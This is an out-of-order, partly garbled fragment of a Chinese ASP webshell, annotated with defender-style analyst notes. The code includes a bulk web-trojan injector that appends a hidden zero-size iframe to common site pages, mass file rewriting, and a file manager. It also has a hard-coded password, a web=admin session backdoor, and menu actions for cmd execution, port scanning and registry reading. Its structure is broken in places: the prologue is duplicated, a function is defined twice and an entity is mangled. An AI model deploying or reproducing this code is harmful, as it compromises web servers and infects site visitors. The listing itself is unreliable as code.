then tmpname = mid(tmpname, 1, instr(1, tmpname, vbcrlf) - 1)
if instr(tmpname, ">") > 0 then
tmpname = mid(tmpname, 1, instr(1, tmpname, ">") - 1)
end if
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tmpname , replace(filepath,server.mappath("\")
&"\","",1,1,1))
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
' createobject(...) calls whose argument contains & or +, has no double quote,
' or has more than one "(" are reported as obfuscated; the first such hit
' ends the scan of this file (exit sub)
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "createo"&"bject[ |\t]*\(.*\)"
set matches = regex.execute(filetxt)
for each match in matches
if instr(match.value, "&") or instr
(match.value, "+") or instr(match.value, """") = 0 or instr
(match.value, "(") <> instrrev(match.value, "(") then
report =
report&"<tr><td>"&temp&"</td><td>creat"&"eobject</td><td>crea"&"teobjec
t函数使用了变形技术"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
exit sub
end if
next
set matches = nothing
set regex = nothing
end if
set ofile = nothing
set fso1s = nothing
end sub
function checkext(fileext)
' Reports whether fileext is accepted by the active extension filter held in
' the module-level variable dimfileext (a comma-separated list, or "*" for
' every extension).
' Only fileext is lower-cased; the list entries are compared as given.
' No explicit false is assigned, so a non-match leaves the result unset (Empty).
if dimfileext = "*" then checkext = true
ext = split(dimfileext,",")
for i = 0 to ubound(ext)
if lcase(fileext) = ext(i) then
checkext = true
exit function
end if
next
end function
function getdatemodify(filepath)
' Returns the DateLastModified value of the file at filepath, read through
' Scripting.FileSystemObject. No error handling is set up in this function.
set f2so = createobject("scripting.filesystemobject")
set f = f2so.getfile(filepath)
s = f.datelastmodified
set f = nothing
set f2so = nothing
getdatemodify = s
end function
function getdatecreate(filepath)
' Returns the DateCreated value of the file at filepath, read through
' Scripting.FileSystemObject. No error handling is set up in this function.
set f3so = createobject("scripting.filesystemobject")
set f = f3so.getfile(filepath)
s = f.datecreated
set f = nothing
set f3so = nothing
getdatecreate = s
end function
function turlencode(str)
' Partial percent-encoding for building report links: replaces only "%", "#"
' and "&" (in that order, so the "%" introduced by later steps is not
' re-encoded). Every other character, including quotes, angle brackets and
' spaces, is returned unchanged, so the result is not safe HTML or a fully
' encoded URL.
temp = replace(str, "%", "%25")
temp = replace(temp, "#", "%23")
temp = replace(temp, "&", "%26")
turlencode = temp
end function
sub showallfile2(path)
' Recursive directory walk for the "search files by condition" mode.
' For every file under path whose extension passes checkext(), calls isfind()
' and increments the module-level counter sumfiles; for every sub-folder,
' recurses and increments sumfolders.
' Does nothing when path is not an existing folder.
set f4so = createobject("scripting.filesystemobject")
if not f4so.folderexists(path) then exit sub
set f = f4so.getfolder(path)
set fc2 = f.files
for each myfile in fc2
if checkext(f4so.getextensionname
(path&"\"&myfile.name)) then
call isfind(path&"\"&myfile.name)
sumfiles = sumfiles + 1
end if
next
set fc = f.subfolders
for each f1 in fc
showallfile2 path&"\"&f1.name
sumfolders = sumfolders + 1
next
set f4so = nothing
end sub
sub isfind(thepath)
' Tests one file against the search form's criteria and, on a match, appends
' an HTML row to the module-level string report and increments sun.
'   - Date filter: the date part of the file's last-modified time must equal
'     one of the ";"-separated values in the search_date form field, unless
'     that field is exactly "all".
'   - Content filter (only when search_content is non-empty): the file is read
'     whole, lower-cased, and must contain the lower-cased search string.
' All criteria come straight from the request; nothing is validated here.
' The sub returns after the first matching date entry.
thedate = getdatemodify(thepath)
on error resume next
' date portion = text before the first space of the timestamp
thetmp = mid(thedate, 1, instr(thedate, " ") - 1)
if err then exit sub
xdate = split(request.form("search_date"),";")
if request.form("search_date") = "all" then alltime = true
for i = 0 to ubound(xdate)
if thetmp = xdate(i) or alltime = true then
if request("search_content") <> "" then
set fso2s = createobject
("scripting.filesystemobject")
set ofile = fso2s.opentextfile(thepath,
1, false, -2)
filetxt = lcase(ofile.readall())
if instr( filetxt, lcase(request.form
("search_content"))) > 0 then
temp = "<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(replace(replace(thepath,server.mappath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thepath,server.mappath("\")&"\","",1,1,1)
&"</a>"
temp=temp&" → <a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
report = report&"<tr><td
height=30>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
report =
report&"<tr><td>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
sun = sun + 1
exit sub
end if
ofile.close()
set ofile = nothing
set fso2s = nothing
else
temp = "<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(replace(replace(filepath,server.mappath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thepath,server.mappath("\")&"\","",1,1,1)
&"</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
report = report&"<tr><td
height=30>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
sun = sun + 1
exit sub
end if
end if
next
end sub
case "plgm"
server.scripttimeout=1000000
response.buffer=false
rrs ("<b>当前网站绝对路径:")&server.mappath("/")&("</b>")
asp_self=request.servervariables("path_info")
s=request("fd")
if s="" then s=server.mappath("/")
ex=request("ex")
pth=request("pth")
newcnt=request("newcnt")
addcode = request("code")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0
height=0></iframe>"
if ex<>"" and pth<>"" then
select case ex
case "edit"
call file_show(pth)
case "save"
call file_save(pth)
end select
else
rrs("<form method=""post""> ")
rrs("<table width=560 border=""0"" style=""font-size:12px;"">")
rrs("<tr>")
rrs("<td width=""102"">要挂马文件夹的绝对路径:</td>")
rrs("<td width=""359""><input type=""text"" name=""fd"" value="""&s&"""
size=60></td>")
rrs("<td width=""69""> </td>")
rrs("</tr><tr><td>要挂马的代码:</td>")
rrs("<td><textarea name=""code"" cols=58
rows=""3"">"&addcode&"</textarea></td>")
rrs("<td><input name=""submit"" type=""submit"" value=""开始""></td>")
rrs("</tr></table></form> ")
end if
function ispattern(patt,str)
' Returns true when the regular expression patt matches anywhere in str
' (case-insensitive), false otherwise.
set regex=new regexp
regex.pattern=patt
regex.ignorecase=true
retval=regex.test(str)
set regex=nothing
if retval=true then
ispattern=true
else
ispattern=false
end if
end function
if request.form("submit")<>"" then
if s="" or addcode="" then
rrs "<font color=red>请输入挂马的路径或代码!</font>"
response.end
else if ispattern("[^ab]{1}:{1}(\\|\/)",s) then sch s
end if
end if
sub sch(s)
' Recursive walk used by the bulk file-modification feature: passes the full
' path of every file in folder s to step_all(), then recurses into each
' sub-folder. Errors are suppressed with "on error resume next", so unreadable
' folders are skipped silently.
' Analyst note: on a compromised host this walk shows up as the web server's
' worker process enumerating and then appending to many files in a short
' window; file-integrity monitoring on the web root and a worker identity
' without write access to content are the relevant controls.
on error resume next
set fs=server.createobject("scripting.filesystemobject")
set fd=fs.getfolder(s)
set fi=fd.files
set sf=fd.subfolders
for each f in fi
rtn=f.path
step_all rtn
next
if sf.count<>0 then
for each l in sf
sch l
next
end if
end sub
sub step_all(agr)
' Target filter for the bulk file-modification feature. agr is a full file
' path; it is selected only when its file name is one of the common web page
' base names in the pattern below (default, index, conn, admin, login, ...)
' followed by one of the extensions htm, html, asp, php, jsp, aspx, cgi, js.
' A selected path is listed by step1() and then modified by step2().
' Analyst note: after an incident, files whose names match this list are the
' ones to diff against a known-good copy first.
retval=ispattern("(\\|\/)
(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|d
iy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|im
ages|web|blog|save|data|add|edit|game|about|manager|book|bt|config|mp3|
vod|error|copy|move|down|system|logo|qq|520|newup|myup|play|show|view|i
p|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfil
e|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|
505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr)
if retval then
step1 agr
step2 agr
else
exit sub
end if
end sub
sub step1(str1)
' Writes one result line for the file path str1: the path itself followed by
' download / edit / delete / copy / move links. Each link calls the page's
' client-side fullform() function with the path (backslashes doubled for the
' script string) and an action name.
' str1 is written into the HTML without encoding.
rrs "<div style='line-height:20px'>√ "&str1&" _"
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""downfile"")' class='am' title='下载'>下载</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""delfile"")'onclick='return yesok()' class='am' title='删除'>删除
</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a></div>"
end sub
sub step2(str2)
' Appends the module-level string addcode to the file str2, if it exists.
' The file is opened as a text stream with mode 8 (append) and format -2
' (system default). When the last eight characters of the path start with
' "conn", the addcode write is not performed (a bare write call is issued
' instead and the stream is not closed in that branch).
' addcode is taken from the request; elsewhere in this file its default is an
' iframe tag with width=0 height=0.
' Analyst note: the artefact left behind is extra markup appended after the
' original end of the file, typically after the closing html tag, with a
' fresh last-modified time. Compare against backups or version control rather
' than relying on timestamps alone.
set fs=server.createobject("scripting.filesystemobject")
isexist=fs.fileexists(str2)
if isexist then
set f=fs.getfile(str2)
set f_addcode=f.openastextstream(8,-2)
if left(right(str2,8),4)="conn" then
f_addcode.write
else
f_addcode.write addcode
f_addcode.close
set f=nothing
end if
end if
set fs=nothing
end sub
err.clear
case "cplgm"
fpath=request("fd")
addcode = request("code")
addcode2 = request("code2")
pcfile=request("pcfile")
checkbox=request("checkbox")
showmsg=request("showmsg")
ftype=request("ftype")
m=request("m")
if ftype="" then
ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
if fpath="\" then fpath=server.mappath("\")
if fpath="." or fpath="" then fpath=server.mappath("/")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm
width=0 height=0></iframe>"
if checkbox="" then checkbox=request("checkbox")
if pcfile="" then
pcfilename=request.servervariables("script_name")
pcfilek=split(pcfilename,"/")
pcfilen=ubound(pcfilek)
pcfile=pcfilek(pcfilen)
end if
rrs ("<b>网站根目录</b>- "&server.mappath("/")&"<br>")
rrs ("<b>本程序目录</b>- "&server.mappath("."))
rrs "<form method=post><div style='color:#3399ff'><b>["
if m="1" then rrs"批量挂马器-批量挂马"
if m="2" then rrs"批量清马器-清除别人的网马"
if m="3" then rrs"批量替换器-文件替换修改工具"
if m="" then response.end
rrs "]</b></div><table width=100% border=0><tr><td>文件路径:
</td>"
rrs "<td><input type=text name=fd value=""\"" size=40> 填“\”
即网站根目录;“.”为程序所在目录</td></tr>"
if m="1" then rrs "<tr><td>过滤重复:</td><td><input class=c
name='checkbox' checked='checked' type=checkbox value=""checked""
"&checkbox&"> 防止一个页面中有多个重复的代码</td></tr>"
rrs "<tr><td>排除文件:</td>"
rrs "<td><input name='pcfile' type=text id='pcfile'
value='"&pcfile&"' size=40> 输入不想被修改的文件名,例如:
1.asp|2.asp|3.asp</td></tr>"
rrs "<tr><td>文件类型:</td>"
rrs "<td><input name='ftype' type=text id='ftype'
value='"&ftype&"' size=40> 输入要修改的文件类型[扩展名],例如:
htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
if m="1" then rrs"要挂的马:"
if m="2" then rrs"要清的马:"
if m="3" then rrs"查找内容:"
rrs"</font></td><td><textarea name=code cols=66
rows=3>"&addcode&"</textarea></td></tr>"
if m="3" then rrs "<tr><td><font color=#3399ff>替 换 为:
</font></td><td><textarea name=code2 cols=66
rows=3>"&addcode&"</textarea></td></tr>"
rrs "<tr><td></td><td> <input name=submit type=submit value=开
始执行> --标记解释--[成功:√ , 排除:× , 重复:<font color=red>×
</font>]</td></tr>"
rrs "</table></form>"
if request("submit")="开始执行" then
rrs"<div style='line-height:25px'><b>执行记录:</b><br>"
call insertallfiles(fpath,addcode,pcfile)
rrs"</div>"
end if
sub insertallfiles(wpath,wcode,pc)
' Bulk file modification over a directory tree.
'   wpath - folder to process (a trailing "\" is added if missing).
'   wcode - the text to append, remove, or search for, depending on the mode.
'   pc    - exclusion list; a file is skipped when its lower-cased name occurs
'           anywhere inside lcase(pc).
' Also reads the module-level values m (mode), checkbox, ftype (extension
' list) and addcode2 (replacement text), all of which are set from the request.
' A file is processed only if it is not excluded and its lower-cased extension
' occurs inside lcase(ftype). Modes:
'   m="1"  append wcode as a new line; with checkbox="checked" the file is
'          first read and skipped when it already contains wcode.
'   m="2"  rewrite the file with every occurrence of wcode removed.
'   m="3"  rewrite the file with every occurrence of wcode replaced by addcode2.
' One status line with file-action links is written per file, then the sub
' recurses into each sub-folder. Errors are suppressed after the
' FileSystemObject is created.
' Analyst note: modes 2 and 3 rewrite whole files through createtextfile with
' overwrite enabled, so the original bytes are gone afterwards; recovery needs
' backups. The observable pattern is many content files under one root
' changing within seconds, written by the web server's worker identity.
server.scripttimeout=999999999
if right(wpath,1)<>"\" then wpath=wpath &"\"
set wfso = createobject("scripting.filesystemobject")
on error resume next
set f = wfso.getfolder(wpath)
set fc2 = f.files
for each myfile in fc2
set fs1 = createobject("scripting.filesystemobject")
' ftype3 = lower-cased text after the last "." of the name, or "无" (none)
ftype1=split(myfile.name,".")
ftype2=ubound(ftype1)
if ftype2>0 then
ftype3=lcase(ftype1(ftype2))
else
ftype3="无"
end if
if instr(lcase(pc),lcase(myfile.name))=0 and instr
(lcase(ftype),ftype3)<>0 then
select case m
case "1"
if checkbox<>"checked" then
set
tfile=fs1.opentextfile(wpath&""&myfile.name,8,-2)
if left(myfile.name,4)="conn"
then
tfile.write
rrs"√
"&wpath&myfile.name
else
tfile.writeline wcode
rrs"√
"&wpath&myfile.name
tfile.close
end if
end if
if checkbox="checked" then
set
tfile1=fs1.opentextfile(wpath&""&myfile.name,1,-2)
if instr
(tfile1.readall,wcode)=0 then
set
tfile=fs1.opentextfile(wpath&""&myfile.name,8,-2)
if left(myfile.name,4)
="conn" then
tfile.write
rrs"×
"&wpath&myfile.name
else
tfile.writeline wcode
rrs"√
"&wpath&myfile.name
tfile1.close
end if
else
rrs"<font
color=red>×</font> "&wpath&myfile.name
tfile1.close
end if
set tfile1=nothing
end if
case "2"
set tfile1=fs1.opentextfile
(wpath&""&myfile.name,1,-2)
newcode=replace
(tfile1.readall,wcode,"")
set
objcountfile=wfso.createtextfile(wpath&myfile.name,true)
objcountfile.write newcode
objcountfile.close
rrs"√ "&wpath&myfile.name
set objcountfile=nothing
case "3"
set tfile1=fs1.opentextfile
(wpath&""&myfile.name,1,-2)
newcode=replace
(tfile1.readall,wcode,addcode2)
set
objcountfile=wfso.createtextfile(wpath&myfile.name,true)
objcountfile.write newcode
objcountfile.close
rrs"√ "&wpath&myfile.name
set objcountfile=nothing
case else
rrs"大哥,别乱来.":response.end
end select
else
rrs"× "&wpath&myfile.name
end if
rrs " → <a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""downfile"")' class='am' title='下
载'>下载</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""editfile"")' class='am' title='编
辑'>编辑</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""delfile"")' onclick='return yesok()' class='am' title='删除'>删
除</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""copyfile"")' class='am' title='复
制'>复制</a> "
rrs "<a href='javascript:fullform("""&replace
(wpath&myfile.name,"\","\\")&""",""movefile"")' class='am' title='移
动'>移动</a><br>"
next
set fsubfolers = f.subfolders
for each f1 in fsubfolers
newpath=wpath&""&f1.name
insertallfiles newpath,wcode,pc
next
set tfile=nothing
set fso = nothing
set tfile=nothing
set tfile2=nothing
set wfso = nothing
end sub
case "readreg":call readreg()
case "show1file":set abc=new lbf:abc.show1file(session
("folderpath")):set abc=nothing
case "downfile":downfile fname:showerr()
case "delfile":set abc=new lbf:abc.delfile(fname):set abc=nothing
case "editfile":set abc=new lbf:abc.editfile(fname):set abc=nothing
case "copyfile":set abc=new lbf:abc.copyfile(fname):set abc=nothing
case "movefile":set abc=new lbf:abc.movefile(fname):set abc=nothing
case "delfolder":set abc=new lbf:abc.delfolder(fname):set abc=nothing
case "copyfolder":set abc=new lbf:abc.copyfolder(fname):set
abc=nothing
case "movefolder":set abc=new lbf:abc.movefolder(fname):set
abc=nothing
case "newfolder":set abc=new lbf:abc.newfolder(fname):set abc=nothing
case "upfile":upfile()
case "cmd1shell":cmd1shell()
case "logout":session.contents.remove("web2a2dmin"):response.redirect
url
case "dbmanager":dbmanager()
case "course":course()
case "serverinfo":serverinfo()
case else mainform()
end select
if action<>"servu" then showerr()
rrs"</body></html>"
%>
' Script prologue. This listing repeats the start of the file after the
' closing %> above; the opening <% is missing from the repeated copy.
' Sets a very large script timeout, enables response buffering and suppresses
' run-time errors for the whole page.
' Analyst note: the three string values below are fixed in this sample and
' can serve as static match strings when hunting for copies of it; operators
' can change them, so absence of a match proves nothing.
server.scripttimeout=999999999
response.buffer =true
on error resume next
userpass="643617" ' password (hard-coded)
mname="by:.尐飛" ' backdoor name
copyright="注:请勿用于非法用途,否则后果作者概不负责" ' copyright notice
server.scripttimeout=999999999
response.buffer =true
on error resume next
sub showerr()
' If an error is pending, writes err.description as a "go back" link, clears
' the error and flushes the response. The description is written without
' HTML encoding.
if err then
rrs"<br><a href='javascript:history.back()'><br> " &
err.description & "</a><br>"
err.clear:response.flush
end if
end sub
sub rrs(str)
' Thin wrapper around response.write; str is emitted exactly as given, with
' no HTML encoding.
response.write(str)
end sub
function repath(s)
' Doubles every backslash in s so the path can be placed inside a script
' string literal in the generated page.
repath=replace(s,"\","\\")
end function
function rrepath(s)
' Inverse of repath: collapses every doubled backslash in s to a single one.
rrepath=replace(s,"\\","\")
end function
' Request state and page head.
' Reads the script URL, the server's local address and the action, folderpath
' and fname request values; resolves the script directory and the site root
' with server.mappath.
' action, folderpath and fname are attacker-controlled request parameters and
' are used unvalidated by the handlers of this file.
url=request.servervariables("url")
serverip=request.servervariables("local_addr")
action=request("action")
rootpath=server.mappath(".")
wwwroot=server.mappath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
folderpath=request("folderpath")
fname=request("fname")
backurl="<br><br><center><a href='javascript:history.back()'>返回
</a></center>"
' Page head: charset gb2312, black colour scheme, and the client-side helpers.
' NOTE(review): mname1 and ad are not assigned in the visible code (the
' prologue sets mname) -- presumably empty here; verify.
rrs"<html><meta http-equiv=""content-type"" content=""text/html;
charset=gb2312"">"
rrs"<title>"&mname1&" - "&serverip&" </title>"
rrs"<style type=""text/css"">"
rrs"body,td{font-size: 12px;background-color:#000000;color:#eee;}"
rrs"input,select,textarea{font-size: 12px;background-
color:#ddd;border:1px solid #fff}"
rrs".c{background-color:#000000;border:0px}"
rrs".cmd{background-color:#000;color:#fff}"
rrs"body{margin: 0px;margin-left:4px;}"
rrs"a{color:#ddd;text-decoration: none;}a:hover
{color:red;background:#000}"
rrs".am{color:#888;font-size:11px;}"
rrs"</style>"
' killerrors: installed as window.onerror so client-side script errors are
' hidden from the person using the page
rrs"<script language=javascript>function killerrors(){return true;}
window.onerror=killerrors;"
rrs"function yesok(){if (confirm(""确认要执行此操作吗?""))return
true;else return false;}"
rrs"function runclock(){thetime = window.settimeout(""runclock()"",
100);var today = new date();var display= today.tolocalestring
();window.status=""→"&ad&" --""+display;}runclock();"
rrs"function showfolder(folder){top.addrform.folderpath.value =
folder;top.addrform.submit();}"
' fullform: fills the hidden form (fields action and fname) and submits it.
' For copy/move actions the source and the prompted destination are joined
' with "||||" in fname -- a distinctive value to look for in captured POST
' bodies.
rrs"function fullform(fname,faction){top.hideform.fname.value =
fname;if(faction==""copyfile""){dname = prompt(""请输入复制到目标文件全
名称"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""movefile""){dname = prompt(""请输入移动到目标文件全名
称"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""copyfolder""){dname = prompt(""请输入移动到目标文件夹全名称
"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""movefolder""){dname = prompt(""请输入移动到目标文件夹全名称
"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""newfolder""){dname = prompt(""请输入要新建的文件夹全名
称"",fname);top.hideform.fname.value = dname;}else{dname = ""other"";}
if(dname!=null){top.hideform.action.value =
faction;top.hideform.submit();}else{top.hideform.fname.value = """";}}"
rrs"</script>"
rrs "<body"
if action="" then rrs " scroll=no"
rrs ">"
' Capability probe: obt(i,0) is a COM ProgID, obt(i,2) its display label and
' obt(i,1) the probe result (" √" or " ×").
' The loop tries server.createobject on each ProgID and marks it unavailable
' only when the pending error equals -2147221005 (0x800401F3, invalid class
' string); any other outcome is marked available.
' Analyst note: the list shows which server components this kind of script
' depends on for file access, command execution, database access, upload and
' mail. Unregistering or restricting the components a site does not need
' removes the matching functions from the script.
dim obt(13,2)
obt(0,0) = "scripting.filesystemobject"
obt(0,2) = "文件操作组件"
obt(1,0) = "wscript.shell"
obt(1,2) = "命令行执行组件"
obt(2,0) = "adox.catalog"
obt(2,2) = "access建库组件"
obt(3,0) = "jro.jetengine"
obt(3,2) = "access压缩组件"
obt(4,0) = "scripting.dictionary"
obt(4,2) = "数据流上传辅助组件"
obt(5,0) = "adodb.connection"
obt(5,2) = "数据库连接组件"
obt(6,0) = "adodb.stream"
obt(6,2) = "数据流上传组件"
obt(7,0) = "softartisans.fileup"
obt(7,2) = "sa-fileup 文件上传组件"
obt(8,0) = "lyfupload.uploadfile"
obt(8,2) = "刘云峰文件上传组件"
obt(9,0) = "persits.upload.1"
obt(9,2) = "aspupload 文件上传组件"
obt(10,0) = "jmail.smtpmail"
obt(10,2) = "jmail 邮件收发组件"
obt(11,0) = "cdonts.newmail"
obt(11,2) = "虚拟smtp发信组件"
obt(12,0) = "smtpmail.smtpmail.1"
obt(12,2) = "smtpmail发信组件"
obt(13,0) = "microsoft.xmlhttp"
obt(13,2) = "数据传输组件"
for i=0 to 13
set t=server.createobject(obt(i,0))
if -2147221005 <> err then
isobj=" √"
else
isobj=" ×"
err.clear
end if
set t=nothing
obt(i,1)=isobj
next
' Current-folder state: a folderpath value from the request (with doubled
' backslashes collapsed) replaces the session value; if the session still has
' none, it defaults to the script's own directory.
' The request value is stored without any check that it lies inside the site.
if folderpath<>"" then
session("folderpath")=rrepath(folderpath)
end if
if session("folderpath")="" then
folderpath=rootpath
session("folderpath")=folderpath
end if
function mainform()
' Writes the main frame layout: a hidden form "hideform" (fields action and
' fname, posted to this script and targeted at the "fileframe" iframe), an
' address-bar form "addrform" carrying folderpath, and two iframes that load
' ?action=mainmenu and ?action=show1file.
' session("folderpath") is written into the value attribute without encoding.
' Analyst note: requests to one .asp file with action=mainmenu and
' action=show1file in quick succession are a recognisable access-log pattern
' for this layout.
rrs"<form name=""hideform"" method=""post"" action="""&url&"""
target=""fileframe"">"
rrs"<input type=""hidden"" name=""action"">"
rrs"<input type=""hidden"" name=""fname"">"
rrs"</form>"
rrs"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
rrs"<tr><td height='30' colspan='2'>"
rrs"<table width='100%'>"
rrs"<form name='addrform' method='post' action='"&url&"'
target='_parent'>"
rrs"<tr><td width='60' align='center'>地址栏:</td><td>"
rrs"<input name='folderpath' style='width:100%' value='"&session
("folderpath")&"'>"
rrs"</td><td width='140' align='center'><input name='submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='fileframe.location.reload()'>"
rrs"</td></tr></form></table></td></tr><tr><td width='170'>"
rrs"<iframe name='left' src='?action=mainmenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
rrs"<td>"
rrs"<iframe name='fileframe' src='?action=show1file' width='100%'
height='100%' frameborder='1'></iframe>"
rrs"</td></tr></table>"
end function
' Stores userpass in session("web2a2dmin") whenever the request carries
' web=admin; no password is compared in this statement. The same session key
' is the one the logout action removes.
' NOTE(review): the login check itself is not in the visible code; presumably
' it compares this session value with userpass, in which case this branch is a
' second, undocumented way in -- confirm against the login routine.
' NOTE(review): url is assigned as a string earlier, so url() looks like a
' call on a non-procedure whose error is swallowed by "on error resume next"
' -- verify.
' Analyst note: a web=admin parameter on requests to a script file is a log
' indicator worth searching for when this sample is suspected.
if request("web")="admin" then
session("web2a2dmin") = userpass
url()
end if
function mainform()
' Second definition of mainform in this listing, with the same body as the
' one above it.
' Writes the main frame layout: a hidden form "hideform" (fields action and
' fname, posted to this script and targeted at the "fileframe" iframe), an
' address-bar form "addrform" carrying folderpath, and two iframes that load
' ?action=mainmenu and ?action=show1file.
' session("folderpath") is written into the value attribute without encoding.
rrs"<form name=""hideform"" method=""post"" action="""&url&"""
target=""fileframe"">"
rrs"<input type=""hidden"" name=""action"">"
rrs"<input type=""hidden"" name=""fname"">"
rrs"</form>"
rrs"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
rrs"<tr><td height='30' colspan='2'>"
rrs"<table width='100%'>"
rrs"<form name='addrform' method='post' action='"&url&"'
target='_parent'>"
rrs"<tr><td width='60' align='center'>地址栏:</td><td>"
rrs"<input name='folderpath' style='width:100%' value='"&session
("folderpath")&"'>"
rrs"</td><td width='140' align='center'><input name='submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='fileframe.location.reload()'>"
rrs"</td></tr></form></table></td></tr><tr><td width='170'>"
rrs"<iframe name='left' src='?action=mainmenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
rrs"<td>"
rrs"<iframe name='fileframe' src='?action=show1file' width='100%'
height='100%' frameborder='1'></iframe>"
rrs"</td></tr></table>"
end function
' Writes the left-hand menu. Every entry is a link back to this script with an
' action value, so the list below doubles as a set of request-log hunting
' strings for this script: course, getterminalinfo, serverinfo, cmd1shell,
' scanport, servu, readreg, editfile, upfile, kmuma, cplgm (m=1..3), plgm,
' logout.
' The drive list and the fixed folder shortcuts are only written when
' obt(0,1) is not " ×"; obt is defined outside this excerpt (presumably a
' component-availability table - confirm).
' NOTE(review): "©right2" near the end looks like "&copyright2&" after the
' hosting page decoded the "&copy" entity; the listing is not valid as shown.
function mainmenu()
rrs"<table width='100%' cellspacing='0' cellpadding='0'>"
rrs"<tr><td height='5'></td></tr>"
rrs"<tr><td><center><a href='"&siteurl2&"' target='_blank'><font
color=red>"&mname2&"</font></center></a><hr hight=1 width='100%'>"
rrs"</td></tr>"
if obt(0,1)=" ×" then
rrs"<tr><td height='24'>无权限</td></tr>"
else
rrs"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬
盘<div id=menu1 style=""width:100%;display='none'""
onmouseout=""menu1.style.display='none'"">"
set abc=new lbf:rrs abc.showdriver():set abc=nothing
rrs"</div></td></tr><tr><td height='20'><a href='javascript:showfolder
("""&repath(wwwroot)&""")'>->站点根目录</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder("""&repath
(rootpath)&""")'>→本程序目录</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\program
files"")'>→program files</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\documents"")'>->documents</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\application data\\symantec\\pcanywhere"")'>-
>pcanywhere</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序
<hr></a></td></tr>"
end if
rrs"<tr><td height='22'><a href='?action=course' target='fileframe'>→
系统服务-用户账号</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=getterminalinfo'
target='fileframe'>→终端端口-自动登录</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=serverinfo'
target='fileframe'>→服务信息-组件支持</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cmd1shell' target='fileframe'>
→执行cmd命令</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=scanport' target='fileframe'>
→端口扫描器</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=servu' target='fileframe'>→
